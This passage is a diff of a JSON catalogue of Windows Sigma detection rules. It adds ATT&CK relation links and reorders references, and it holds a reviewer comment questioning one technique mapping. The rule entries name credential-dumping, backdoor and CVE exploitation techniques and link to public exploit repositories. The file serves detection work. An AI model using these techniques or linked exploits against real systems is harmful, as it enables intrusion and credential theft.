@@ -6681,6 +8463,15 @@ "attack.t1528" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", "value": "Suspicious Teams Application Related ObjectAcess Event" }, @@ -6731,6 +8522,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", "value": "User Added to Local Administrators" }, @@ -6755,6 +8555,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", "value": "Hidden Local User Creation" }, @@ -6817,8 +8626,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/duzvik/status/1269671601852813320", "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://twitter.com/duzvik/status/1269671601852813320", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" ], "tags": [ 
@@ -6842,8 +8651,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" ], "tags": [ @@ -6851,6 +8660,15 @@ "attack.t1187" ] }, + "related": [ + { + "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "value": "Possible PetitPotam Coerce Authentication Attempt" }, @@ -6875,6 +8693,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", "value": "Disabling Windows Event Auditing" }, @@ -6891,9 +8718,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], "tags": [ 
@@ -6918,8 +8745,8 @@ "logsource.product": "windows", "refs": [ "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", - "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://adsecurity.org/?p=3466", + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" ], "tags": [ @@ -6927,6 +8754,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", "value": "Active Directory User Backdoors" }, @@ -6968,9 +8804,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://twitter.com/SBousseaden/status/1581300963650187264?", "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", - "https://twitter.com/SBousseaden/status/1581300963650187264?", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" ], "tags": [ @@ -6978,6 +8814,15 @@ "attack.t1556" ] }, + "related": [ + { + "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", "value": "Possible Shadow Credentials Added" }, @@ -7004,6 +8849,15 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", "value": "WCE wceaux.dll Access" }, 
@@ -7020,9 +8874,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" ], "tags": [ @@ -7034,6 +8888,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "value": "CobaltStrike Service Installations - Security" }, @@ -7078,6 +8941,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", "value": "Addition of Domain Trusts" }, @@ -7095,10 +8967,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" ], "tags": [ 
@@ -7107,6 +8979,15 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "value": "Mimikatz DC Sync" }, @@ -7180,8 +9061,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1101431884540710913", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://twitter.com/SBousseaden/status/1101431884540710913", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" ], "tags": [ @@ -7208,8 +9089,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1490608838701166596", "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://twitter.com/SBousseaden/status/1490608838701166596", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" ], "tags": [ @@ -7217,6 +9098,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "value": "Service Installed By Unusual Client - Security" }, @@ -7241,6 +9131,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", "value": "Enabled User Right in AD to Control User Objects" }, 
@@ -7258,8 +9157,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", - "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", "https://twitter.com/malmoeb/status/1511760068743766026", + "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" ], "tags": [ @@ -7296,6 +9195,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", "value": "Suspicious Scheduled Task Update" }, @@ -7323,6 +9231,15 @@ "car.2016-04-005" ] }, + "related": [ + { + "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", "value": "Admin User Remote Logon" }, @@ -7349,6 +9266,15 @@ "cve.2021.34527" ] }, + "related": [ + { + "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access" }, @@ -7374,6 +9300,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security" }, 
@@ -7449,6 +9384,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", "value": "Potential Remote Desktop Connection to Non-Domain Host" }, @@ -7465,8 +9409,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" ], "tags": [ @@ -7474,6 +9418,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", "value": "CVE-2020-0688 Exploitation via Eventlog" }, @@ -7497,6 +9450,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "value": "Atera Agent Installation" }, @@ -7522,6 +9484,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", "value": "Backup Catalog Deleted" }, 
@@ -7546,6 +9517,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379" }, @@ -7594,6 +9574,22 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "value": "MSI Installation From Web" }, @@ -7634,8 +9630,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", + "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" ], @@ -7644,6 +9640,15 @@ "attack.t1588" ] }, + "related": [ + { + "dest-uuid": "ce0687a0-e692-4b77-964a-0784a8e54ff1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", "value": "Relevant Anti-Virus Event" }, 
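Review bot: In the `@@ -7546,6 +9517,15 @@` hunk, the relation added to `LPE InstallerFileTakeOver PoC CVE-2021-41379` points at `3f886f2a-874f-4333-b794-aa6075009b1c`, the same UUID this diff emits for `attack.t1190` on `CVE-2020-0688 Exploitation via Eventlog` in the preceding hunk; T1190 (Exploit Public-Facing Application) is an initial-access technique, while the rule's own title says it detects a local privilege escalation PoC. The tag is inherited from the upstream Sigma rule, but the generator stamps every relation with `estimative-language:likelihood-probability="almost-certain"` regardless of fit, which overstates confidence to anyone consuming these relations for ATT&CK coverage mapping. Consider a lower default such as `"likely"` for mechanically derived tag-to-UUID links, or report the mismatch upstream so the rule is retagged (T1068, Exploitation for Privilege Escalation, would fit an LPE).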
@@ -7715,6 +9720,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", "value": "Application Uninstalled" }, @@ -7731,8 +9745,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" ], "tags": [ @@ -7741,6 +9755,15 @@ "attack.t1562.001" ] }, + "related": [ + { + "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c82cf5c-090d-4d57-9188-533577631108", "value": "Microsoft Malware Protection Engine Crash" }, @@ -7758,8 +9781,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" ], "tags": [ 
@@ -7783,8 +9806,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml" ], "tags": [ @@ -7792,6 +9815,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a18e0862-127b-43ca-be12-1a542c75c7c5", "value": "Potential Credential Dumping Via WER - Application" }, @@ -7811,8 +9843,8 @@ "https://twitter.com/DidierStevens/status/1217533958096924676", "https://nullsec.us/windows-event-log-audit-cve/", "https://twitter.com/VM_vivisector/status/1217190929330655232", - "https://www.youtube.com/watch?v=ebmW42YYveI", "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://www.youtube.com/watch?v=ebmW42YYveI", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" ], "tags": [ 
@@ -7830,6 +9862,50 @@ "attack.t1499.004" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "value": "Audit CVE Event" }, @@ -7854,6 +9930,15 @@ "attack.t1546" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "value": "MSSQL Extended Stored Procedure Backdoor Maggie" }, 
@@ -7870,8 +9955,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" ], "tags": [ @@ -7918,8 +10003,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" ], "tags": [ @@ -7950,6 +10035,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", "value": "Rare Scheduled Task Creations" }, @@ -7973,6 +10067,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", "value": "Suspicious Scheduled Tasks Locations" }, 
@@ -7989,8 +10092,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" ], "tags": [ @@ -8014,8 +10117,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/j00sean/status/1537750439701225472", "https://twitter.com/nas_bench/status/1539679555908141061", + "https://twitter.com/j00sean/status/1537750439701225472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" ], "tags": [ @@ -8071,6 +10174,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", "value": "Code Integrity Blocked Driver Load" }, @@ -8095,6 +10207,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", "value": "Block Load Of Revoked Driver" }, 
@@ -8112,8 +10233,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/moti_b/status/1032645458634653697", "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", + "https://twitter.com/moti_b/status/1032645458634653697", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" ], "tags": [ @@ -8137,9 +10258,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://twitter.com/KevTheHermit/status/1410203844064301056", "https://github.com/afwu/PrintNightmare", + "https://twitter.com/KevTheHermit/status/1410203844064301056", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" ], "tags": [ 
@@ -8186,11 +10307,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", - "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", "https://winaero.com/enable-openssh-server-windows-10/", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", + "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" ], "tags": [ @@ -8214,9 +10335,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/afwu/PrintNightmare", "https://github.com/hhlxf/PrintNightmare", "https://twitter.com/fuzzyf10w/status/1410202370835898371", - "https://github.com/afwu/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" ], "tags": [ @@ -8225,6 +10346,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", "value": "Possible CVE-2021-1675 Print Spooler Exploitation" }, 
@@ -8250,6 +10380,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "value": "CVE-2021-1675 Print Spooler Exploitation" }, @@ -8325,6 +10464,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "value": "LSASS Access Detected via Attack Surface Reduction" }, @@ -8341,8 +10489,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", "https://twitter.com/duff22b/status/1280166329660497920", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" ], "tags": [ @@ -8352,6 +10500,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "value": "PSExec and WMI Process Creations Block" }, 
@@ -8392,8 +10556,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" ], "tags": [ @@ -8448,6 +10612,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", "value": "Windows Defender AMSI Trigger Detected" }, @@ -8472,6 +10645,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + 